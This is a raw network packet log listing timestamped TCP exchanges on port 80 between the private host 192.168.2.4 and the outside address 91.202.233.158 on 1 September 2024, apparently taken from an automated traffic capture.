Sep 1, 2024 18:28:22.632911921 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632916927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632924080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632932901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632936001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632947922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632956982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632960081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632971048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.632972002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.632998943 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633022070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633573055 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633583069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633594036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633605003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633616924 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633618116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633627892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633639097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633646965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633651018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633657932 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633662939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633673906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633677959 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633686066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.633707047 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.633728027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716360092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716438055 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716448069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716479063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716496944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716504097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716506004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716516018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716526985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716541052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716566086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716703892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716712952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716722012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716732979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716737032 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716742039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716763020 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716782093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716784000 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716844082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716888905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716897964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716907024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716917038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716928005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716929913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716938019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716948032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.716958046 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716967106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.716975927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717118025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717128038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717137098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717149019 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717159033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717163086 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717456102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717466116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717473984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717483997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717484951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717484951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717493057 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717502117 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717503071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717516899 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717520952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717521906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717539072 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717539072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717554092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717578888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717711926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717720985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717731953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717741966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717744112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717753887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717763901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717770100 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717772961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717782974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717792034 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717796087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.717799902 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717824936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.717835903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718185902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718195915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718204021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718214989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718225002 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718226910 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718234062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718249083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718250036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718257904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718262911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718267918 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718277931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718286991 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718290091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718298912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718308926 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718308926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718318939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718319893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718328953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718337059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718338013 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718348026 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718372107 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718642950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718652964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718662024 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718673944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718684912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718684912 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718707085 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718714952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718729973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718739986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718750000 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718760967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718770027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718772888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718780994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718790054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718796968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718799114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.718807936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.718832970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719279051 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719288111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719297886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719306946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719316006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719324112 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719325066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719336987 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719346046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719351053 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719356060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719357014 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719366074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719376087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719384909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719386101 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719394922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719409943 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719427109 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719760895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719770908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719779015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719789982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719794035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719799995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719810963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719821930 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719821930 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719831944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719840050 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719842911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719851971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719862938 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719871998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.719882965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.719906092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720124960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720134020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720149040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720164061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720175982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720263004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720273018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720280886 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720289946 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720298052 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720299959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720304966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720310926 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720320940 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720324039 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720331907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720340967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720350027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720350981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720360994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720367908 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720371962 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720381021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.720388889 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.720419884 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803278923 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803386927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803397894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803437948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803512096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803579092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803591013 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803601027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803613901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803622961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803638935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803662062 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803674936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803684950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803694963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803709030 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803719044 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803736925 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803922892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803934097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803944111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803966999 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803976059 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803986073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.803987980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.803994894 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804007053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804008961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804017067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804034948 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804038048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804045916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804055929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804060936 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804065943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804076910 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804089069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804104090 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804112911 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804136992 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804171085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804176092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804178953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804193974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804210901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804234982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804533005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804543972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804553986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804565907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804575920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804578066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804578066 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804586887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804599047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804610968 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804611921 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804637909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804649115 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804655075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804666042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804677010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804693937 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804698944 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804706097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804717064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804722071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804727077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804744005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804771900 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804900885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804910898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804920912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804933071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804941893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804944992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804955959 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804966927 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.804970980 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.804982901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805003881 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805167913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805179119 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805187941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805212021 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805213928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805224895 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805234909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805238008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805246115 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805255890 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805262089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805274010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805284023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805288076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805295944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805301905 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805306911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805316925 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805325985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805356979 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805377960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805635929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805649042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805659056 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805674076 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805682898 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805704117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805778027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805788040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805797100 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805808067 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805810928 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805824041 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805829048 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805838108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805849075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805850983 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805860043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805871010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805876970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805881977 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805892944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805902958 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805903912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.805917025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.805943012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.806839943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.806849003 CEST	80	56177	91.202.233.158	192.168.2.4
